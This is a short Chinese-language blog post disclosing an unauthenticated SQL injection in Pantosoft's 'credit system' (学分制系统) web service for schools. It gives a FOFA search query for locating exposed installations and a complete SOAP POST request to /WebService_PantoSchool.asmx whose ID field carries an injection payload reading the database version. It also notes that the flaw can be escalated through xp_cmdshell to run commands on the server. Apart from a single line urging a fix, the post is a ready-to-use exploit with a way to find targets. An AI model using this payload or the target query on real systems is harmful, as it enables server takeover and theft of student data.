Babing
Published on 2024-08-30 / 2 Visits
0
0

S27-1上海鹏达-学分制系统-SQL

S27-1上海鹏达-学分制系统-SQL

漏洞描述:

学分制系统 GetCalendarContentById、GetCurrentCalendar等实例处存在SQL注入漏洞,未经身份验证的远程攻击者可利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。

网站图片:

网站图片

fofa语法:

body=“www.pantosoft.com” && body=“Pantosoft Corporation” || icon_hash=“-1632820573”

漏洞复现:

查询数据库版本
payload:

POST /WebService_PantoSchool.asmx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Content-Type: text/xml; charset=utf-8
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
  <soapenv:Header/>
    <soapenv:Body>
      <tem:GetCalendarContentById>
        <!--type: string-->
        <tem:ID>1' OR 1 IN (SELECT @@version) AND '1'='1</tem:ID>
      </tem:GetCalendarContentById>
    </soapenv:Body>
</soapenv:Envelope>

效果图:
效果图


Comment